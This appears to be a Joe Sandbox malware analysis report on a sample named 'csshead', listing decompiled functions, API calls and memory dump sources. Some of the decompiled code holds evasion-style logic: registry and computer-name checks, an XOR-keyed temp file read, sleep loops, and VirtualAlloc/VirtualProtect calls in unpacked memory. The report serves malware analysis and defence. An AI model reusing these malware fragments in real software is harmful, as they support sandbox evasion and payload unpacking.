RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D

Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00422A18, Relevance: 1.6, APIs: 1, Instructions: 58

C-Code - Quality: 100%

			E00422A18(void* __edx, void* __edi, void* __esi, long _a4) {
				long _t6;
				void* _t7;
				void* _t11;
				long _t14;
				void* _t19;
				void* _t21;
				intOrPtr _t25;

				_t19 = __edx;
				_t14 = _a4;
				if(_t14 > 0xffffffe0) {
					L00427A95(_t14);
					 *((intOrPtr*)(L004251B8(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				while(1) {
					_t27 =  *0x4432a4;
					if( *0x4432a4 == 0) {
						L00426517(_t19, _t27);
						L00426368(_t19, 0x1e);
						E004243C2(0xff);
					}
					if(_t14 == 0) {
						_t6 = 1;
						__eflags = 1;
					} else {
						_t6 = _t14;
					}
					_t7 = RtlAllocateHeap( *0x4432a4, 0, _t6); // executed
					_t21 = _t7;
					if(_t21 != 0) {
						break;
					}
					_t25 = 0xc;
					if( *0x4432ac == _t7) {
						 *((intOrPtr*)(L004251B8(__eflags))) = _t25;
						L12:
						 *((intOrPtr*)(L004251B8(_t31))) = _t25;
						break;
					}
					_t11 = L00427A95(_t14);
					_t31 = _t11;
					if(_t11 != 0) {
						continue;
					}
					goto L12;
				}
				return _t21;
			}

0x00422a18
0x00422a1e
0x00422a24
0x00422a96
0x00422aa1
0x00422aa7
0x00000000
0x00422aa7
0x00422a28
0x00422a28
0x00422a2f
0x00422a31
0x00422a38
0x00422a42
0x00422a48
0x00422a4b
0x00422a53
0x00422a53
0x00422a4d
0x00422a4d
0x00422a4d
0x00422a5d
0x00422a63
0x00422a67
0x00000000
0x00000000
0x00422a6b
0x00422a72
0x00422a86
0x00422a88
0x00422a8d
0x00000000
0x00422a8d
0x00422a75
0x00422a7b
0x00422a7d
0x00000000
0x00000000
0x00000000
0x00422a7f
0x00000000

APIs

Part of subcall function 00426368: GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,00000000,?), ref: 00426404
Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426433
Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426440
Part of subcall function 00426368: GetStdHandle.KERNEL32(000000F4,00000001,00000000,?), ref: 004264B6
Part of subcall function 00426368: _strlen.LIBCMT ref: 004264F3
Part of subcall function 00426368: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502

Part of subcall function 004243C2: ExitProcess.KERNEL32 ref: 004243D3

RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D

Part of subcall function 00427A95: DecodePointer.KERNEL32(?,0042B008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 00427AA0

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00407118, Relevance: 1.6, APIs: 1, Instructions: 57
registry

C-Code - Quality: 93%

			E00407118(void* __ecx) {
				signed char _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* _v24;
				void* _v28;
				char _v285;
				intOrPtr _t23;
				intOrPtr _t30;
				void* _t36;
				intOrPtr _t42;
				signed int _t45;

				_v8 = 0;
				_t23 =  *0x40a564; // 0x4070d0
				_v20 = E00403F38(_t23);
				RegOpenKeyExA(0x80000002, _v20, 0, 0x20019,  &_v12); // executed
				E00401440(_v20);
				_v16 = 0x101;
				_t30 =  *0x40a568; // 0x4070f0
				_v24 = E00403F38(_t30);
				_t36 = E004038B0(_v12, _v24, 0, 0,  &_v285,  &_v16); // executed
				if(_t36 == 0) {
					_t42 =  *0x40a56c; // 0x407108
					_v28 = E00403F38(_t42);
					_t45 = E00401110( &_v285, _v28);
					asm("sbb eax, eax");
					_v8 =  ~(_t45 & 0xffffff00 | _t45 != 0x00000000);
					E00401440(_v28);
				}
				E00401440(_v24);
				E00403890(_v12);
				return _v8;
			}

0x00407123
0x00407126
0x00407130
0x00407147
0x00407150
0x00407155
0x0040715c
0x00407166
0x00407180
0x0040718a
0x0040718c
0x00407196
0x004071a2
0x004071ae
0x004071b0
0x004071b6
0x004071b6
0x004071be
0x004071c6
0x004071d1

APIs

RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?), ref: 00407147

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC

Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0042AFAC, Relevance: 1.6, APIs: 1, Instructions: 52LIBRARYCODE

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042AFEF

Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042AFAC, Relevance: 1.6, APIs: 1, Instructions: 52

C-Code - Quality: 86%

			E0042AFAC(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x4432a4, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x4432ac;
					if( *0x4432ac == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = L00427A95(_t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(L004251B8(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x0042afb1
0x0042afb6
0x0042afd3
0x0042afd8
0x0042afda
0x0042afdc
0x0042afde
0x0042afde
0x0042afde
0x00000000
0x0042afe6
0x0042afef
0x0042aff5
0x0042aff7
0x00000000
0x00000000
0x0042b02b
0x0042b02d
0x00000000
0x0042aff9
0x0042aff9
0x0042b000
0x0042b01e
0x0042b021
0x0042b023
0x0042b025
0x0042b025
0x0042b002
0x0042b003
0x0042b009
0x0042b00b
0x0042afdf
0x0042afdf
0x0042afe1
0x0042afe4
0x00000000
0x00000000
0x00000000
0x00000000
0x0042b00d
0x0042b00d
0x0042b010
0x0042b012
0x0042b014
0x0042b014
0x0042b01a
0x0042b01a
0x0042b00b
0x00000000
0x0042afb8
0x0042afbc
0x0042afbf
0x0042afc2
0x00000000
0x0042afc4
0x0042afc9
0x0042afd2
0x0042afd2
0x0042afc2
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 0042AFEF

Part of subcall function 00427A95: DecodePointer.KERNEL32(?,0042B008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 00427AA0

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004069BC, Relevance: 1.5, APIs: 1, Instructions: 35

C-Code - Quality: 100%

			E004069BC(void* __edx, void* __eflags) {
				signed int _v8;
				signed int* _v12;
				intOrPtr _v16;
				char _v273;
				char _v338;
				intOrPtr _t24;

				_v8 = 0;
				E00406904( &_v338); // executed
				GetTempPathA(0x101,  &_v273);
				E0040133C( &_v273,  &_v338);
				_t24 = E004047AC( &_v273,  &_v12); // executed
				_v16 = _t24;
				if(_v16 != 0xffffffff) {
					if(_v16 == 4) {
						_v8 =  *_v12 ^ 0xcbc3f6a1;
					}
					E00401828(_v12);
				}
				return _v8;
			}

0x004069c7
0x004069d0
0x004069e1
0x004069f5
0x00406a06
0x00406a0b
0x00406a12
0x00406a18
0x00406a24
0x00406a24
0x00406a2a
0x00406a2a
0x00406a35

APIs

Part of subcall function 00406904: GetComputerNameA.KERNEL32(?,?), ref: 00406927
Part of subcall function 00406904: RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965

GetTempPathA.KERNEL32(00000101,?), ref: 004069E1

Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849

Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00424946, Relevance: 1.5, APIs: 1, Instructions: 22

APIs

Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C

RtlEncodePointer.NTDLL(00000000), ref: 00424957

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00424946, Relevance: 1.5, APIs: 1, Instructions: 22

C-Code - Quality: 37%

			E00424946() {
				intOrPtr _t2;
				void* _t4;
				signed int* _t7;

				_t7 = E0042A124(0x20, 4);
				_t2 =  *0x4331b8(_t7); // executed
				 *0x444aa0 = _t2;
				 *0x444a9c = _t2;
				if(_t7 != 0) {
					 *_t7 =  *_t7 & 0x00000000;
					return 0;
				} else {
					_t4 = 0x18;
					return _t4;
				}
			}

0x00424954
0x00424957
0x0042495d
0x00424962
0x00424969
0x00424970
0x00424976
0x0042496b
0x0042496d
0x0042496f
0x0042496f

APIs

Part of subcall function 0042A124: Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C

RtlEncodePointer.NTDLL(00000000), ref: 00424957

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004038B0, Relevance: 1.5, APIs: 1, Instructions: 21
registry

C-Code - Quality: 100%

			E004038B0(void* _a4, char* _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
				long _v8;
				long _t15;

				_t15 = RegQueryValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				_v8 = _t15;
				return _v8;
			}

0x004038cc
0x004038d2
0x004038da

APIs

RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 01963894, Relevance: 1.5, APIs: 1, Instructions: 18

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 019638B7

Memory Dump Source

Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1963000_csshead.jbxd

Function 0042893E, Relevance: 1.5, APIs: 1, Instructions: 13

APIs

RtlEncodePointer.NTDLL(5316C151), ref: 0042894A

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042893E, Relevance: 1.5, APIs: 1, Instructions: 13

APIs

RtlEncodePointer.NTDLL(0042F6FF,?,?,0042446F), ref: 0042894A

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042769E, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042769E, Relevance: 1.5, APIs: 1, Instructions: 10

C-Code - Quality: 100%

			E0042769E() {
				void* _t3;

				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0x4432a4 = _t3;
				return 0 | _t3 != 0x00000000;
			}

0x004276a7
0x004276b4
0x004276bb

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042AF49, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

RtlEncodePointer.NTDLL(Function_0001AEC5), ref: 0042AF4E

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042AF49, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

RtlEncodePointer.NTDLL(Function_0002AEC5,?,00423F7F,?,?,?,?,?,00000000,00000000,00000000), ref: 0042AF4E

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00425CFE, Relevance: 1.5, APIs: 1, Instructions: 3LIBRARYCODE

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00425D00

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00425CFE, Relevance: 1.5, APIs: 1, Instructions: 3

APIs

RtlEncodePointer.NTDLL(00000000,0042E431,00442C78,00000314,00000000,?,?,?,?,?,004264A5,00442C78,Microsoft Visual C++ Runtime Library,00012010), ref: 00425D00

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00406B60, Relevance: 1.3, APIs: 1, Instructions: 46
sleep

C-Code - Quality: 100%

			E00406B60(intOrPtr* __eax, void* __ebx, void* __ecx, char* __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;

				_t43 = __edx;
				_v8 = __eax;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					E00406B18( &_v32, __ebx, __ecx, _t43);
					_t43 =  &_v32;
					E00406A74( &_v24,  &_v32);
					Sleep(0x1f4); // executed
					_v16 = _v16 + 1;
				} while (_v16 != 0xa);
				_v12 = 0xffffffff;
				_v28 = 0;
				_v32 = 0x9c40;
				 *_v8 = _v24;
				if(E00406ACC( &_v32,  &_v24) != 0) {
					_v28 = 0;
					_v32 = 0xa;
					if(E00406ACC( &_v24,  &_v32) != 0) {
						_v12 = 0;
					}
				}
				return _v12;
			}

0x00406b60
0x00406b66
0x00406b6b
0x00406b70
0x00406b75
0x00406b78
0x00406b7b
0x00406b83
0x00406b86
0x00406b90
0x00406b96
0x00406b99
0x00406b9f
0x00406ba8
0x00406bab
0x00406bb8
0x00406bc7
0x00406bcb
0x00406bce
0x00406be2
0x00406be6
0x00406be6
0x00406be2
0x00406bef

APIs

Sleep.KERNELBASE(000001F4), ref: 00406B90

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0042A124, Relevance: 1.3, APIs: 1, Instructions: 30sleepLIBRARYCODE

APIs

Part of subcall function 0042AFAC: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042AFEF

Sleep.KERNEL32(00000000), ref: 0042A14C

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042A124, Relevance: 1.3, APIs: 1, Instructions: 30
sleep

C-Code - Quality: 100%

			E0042A124(signed int _a4, signed int _a8) {
				void* _t4;
				long _t6;
				void* _t7;
				long _t8;
				void* _t9;

				_t8 = 0;
				while(1) {
					_t4 = E0042AFAC(_a4, _a8, 0); // executed
					_t7 = _t4;
					_t9 = _t9 + 0xc;
					if(_t7 != 0 ||  *0x443340 <= _t4) {
						break;
					}
					Sleep(_t8);
					_t3 = _t8 + 0x3e8; // 0x3e8
					_t6 = _t3;
					if(_t6 >  *0x443340) {
						_t6 = _t6 | 0xffffffff;
					}
					_t8 = _t6;
					if(_t6 != 0xffffffff) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x0042a12b
0x0042a12d
0x0042a135
0x0042a13a
0x0042a13c
0x0042a141
0x00000000
0x00000000
0x0042a14c
0x0042a152
0x0042a152
0x0042a15e
0x0042a160
0x0042a160
0x0042a163
0x0042a168
0x00000000
0x00000000
0x00000000
0x0042a168
0x0042a16f

APIs

Part of subcall function 0042AFAC: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 0042AFEF

Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042A0DF, Relevance: 1.3, APIs: 1, Instructions: 28sleepLIBRARYCODE

APIs

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D

Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042A0DF, Relevance: 1.3, APIs: 1, Instructions: 28
sleep

C-Code - Quality: 100%

			E0042A0DF(intOrPtr _a4) {
				void* __edi;
				void* __esi;
				void* _t3;
				long _t5;
				void* _t7;
				void* _t8;
				long _t9;

				_t9 = 0;
				while(1) {
					_t3 = E00422A18(_t7, _t8, _t9, _a4); // executed
					_t8 = _t3;
					if(_t8 != 0 ||  *0x443340 <= _t3) {
						break;
					}
					Sleep(_t9);
					_t2 = _t9 + 0x3e8; // 0x3e8
					_t5 = _t2;
					if(_t5 >  *0x443340) {
						_t5 = _t5 | 0xffffffff;
					}
					_t9 = _t5;
					if(_t5 != 0xffffffff) {
						continue;
					}
					break;
				}
				return _t8;
			}

0x0042a0e6
0x0042a0e8
0x0042a0eb
0x0042a0f0
0x0042a0f5
0x00000000
0x00000000
0x0042a100
0x0042a106
0x0042a106
0x0042a112
0x0042a114
0x0042a114
0x0042a117
0x0042a11c
0x00000000
0x00000000
0x00000000
0x0042a11c
0x0042a123

APIs

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D

Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 01960570, Relevance: 1.3, APIs: 1, Instructions: 18

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 01960593

Memory Dump Source

Source File: 00000000.00000002.16599178748.01960000.00000040.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1960000_csshead.jbxd

Function 01963854, Relevance: 1.3, APIs: 1, Instructions: 18

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 01963877

Memory Dump Source

Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1963000_csshead.jbxd

Function 01960540, Relevance: 1.3, APIs: 1, Instructions: 17

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 01960560

Memory Dump Source

Source File: 00000000.00000002.16599178748.01960000.00000040.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1960000_csshead.jbxd

Function 004013B4, Relevance: 1.3, APIs: 1, Instructions: 17

C-Code - Quality: 100%

			E004013B4(void** __eax, long __edx) {
				void** _v8;
				long _v12;
				void* _t7;

				_v12 = __edx;
				_v8 = __eax;
				_t7 = VirtualAlloc(0, _v12, 0x3000, 4); // executed
				 *_v8 = _t7;
				return _t7;
			}

0x004013ba
0x004013bd
0x004013cd
0x004013d6
0x004013db

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 01963824, Relevance: 1.3, APIs: 1, Instructions: 17

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 01963844

Memory Dump Source

Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1963000_csshead.jbxd

Function 019604E0, Relevance: 1.3, APIs: 1, Instructions: 16

APIs

GlobalAlloc.KERNELBASE(?,?), ref: 019604FD

Memory Dump Source

Source File: 00000000.00000002.16599178748.01960000.00000040.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1960000_csshead.jbxd

Function 01963764, Relevance: 1.3, APIs: 1, Instructions: 16

APIs

GlobalAlloc.KERNELBASE(?,?), ref: 01963781

Memory Dump Source

Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1963000_csshead.jbxd

Function 00401828, Relevance: 1.3, APIs: 1, Instructions: 12

C-Code - Quality: 100%

			E00401828(void* __eax) {
				void* _v8;
				int _t5;

				_v8 = __eax;
				_t5 = VirtualFree(_v8, 0, 0x8000); // executed
				return _t5;
			}

0x0040182c
0x0040183a
0x00401842

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Non-executed Functions

Function 00418190, Relevance: 24.3, APIs: 16, Instructions: 275comnativestring

APIs

SetWindowLongA.USER32(?,000000EC,00000000), ref: 004181EE
GetWindowLongA.USER32(?,000000EB), ref: 004181FC
OleUninitialize.OLE32 ref: 0041820E
OleInitialize.OLE32(00000000), ref: 0041821B
GetWindowTextLengthA.USER32(?), ref: 00418222

